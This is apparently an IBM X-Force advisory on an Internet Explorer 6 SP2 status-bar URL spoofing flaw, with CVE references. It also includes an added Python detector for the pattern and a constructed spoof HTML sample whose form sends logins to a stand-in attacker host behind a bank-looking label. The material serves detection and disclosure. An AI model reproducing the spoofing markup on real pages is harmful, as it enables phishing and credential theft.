Microsoft Internet Explorer A HREF status bar spoofing

ie-ahref-status-spoofing (17938) Risk level: Medium

Description:

Microsoft Internet Explorer could allow a remote attacker to spoof a trusted Web page by altering the URL that is displayed in the Internet Explorer status bar. A remote attacker could create a specially-crafted URL link containing malformed A HREF tags, which will cause the spoofed URL to be displayed in the status bar, once the link is clicked. An attacker could exploit this vulnerability by creating a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email.
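A content-inspection check for the element pattern this entry and its CVE references describe, added here as an example and not part of the X-Force record: it parses an HTML document and flags any form whose real action host differs from the host that the BASE element, the anchor hrefs or a URL-looking submit label would lead a user to expect (this covers both the CVE-2004-1104 and the CVE-2006-0799 arrangements). The function names, host names and sample HTML are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class _SpoofPatternScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.base = ""            # href of the BASE element, "" if none
        self.anchor_hrefs = []    # hrefs of A elements ("" if missing)
        self.forms = []           # {"action": ..., "submits": [button labels]}
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "base" and a.get("href"):
            self.base = a["href"]
        elif tag == "a":
            self.anchor_hrefs.append(a.get("href", ""))
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "submits": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form and a.get("type", "").lower() == "submit":
            self._form["submits"].append(a.get("value", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def _host(url, base):
    return urlsplit(urljoin(base, url)).hostname or ""

def find_status_bar_spoofs(html, page_url="http://page.example/"):
    """(shown_host, real_host) pairs for forms whose action host differs from what BASE, anchors or labels suggest."""
    p = _SpoofPatternScanner()
    p.feed(html)
    p.close()
    base = urljoin(page_url, p.base) if p.base else page_url
    expected = {_host(h, base) for h in p.anchor_hrefs + [p.base] if h}  # legitimate-looking hosts
    findings = []
    for form in p.forms:
        real = _host(form["action"], base)  # where the submission actually goes
        labels = {_host(v, base) for v in form["submits"] if v.startswith(("http://", "https://"))}
        for shown in sorted(labels | expected):
            if shown and real and shown != real:
                findings.append((shown, real))
    return findings

# Constructed sample of the BASE + empty-href anchor + FORM pattern from CVE-2004-1104.
SPOOF_HTML = ('<base href="http://bank.example/"><a href=""><form action="http://attacker.invalid/login">'
              '<input type="submit" value="http://bank.example/login"></form></a>')
BENIGN_HTML = '<form action="/login"><input type="submit" value="Sign in"></form>'  # constructed
```

On the constructed spoof sample the function returns [('bank.example', 'attacker.invalid')]; on the benign form it returns an empty list.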

Platforms Affected:

  • Microsoft Internet Explorer 6 SP2

Remedy:

No remedy available as of July 4, 2009.

Consequences:

Other

References:

  • BugTraq Mailing List, Sat Oct 30 2004 - 13:16:07 CDT, Re: New URL spoofing bug in Microsoft Internet Explorer at http://archives.neohapsis.com/archives/bugtraq/2004-10/0356.html.
  • BID-11565: Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
  • CVE-2004-1104: Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty href attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL.
  • CVE-2006-0799: Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate href attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different.
  • OSVDB ID: 23609: Microsoft IE Crafted Elements Status Bar URL Spoofing
  • SA11273: Internet Explorer/Outlook Express Restricted Zone Status Bar Spoofing
  • US-CERT VU#702086: Multiple web browsers do not properly interpret BASE and FORM elements when displaying URLs in the status bar

Reported:

Oct 30, 2004

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net
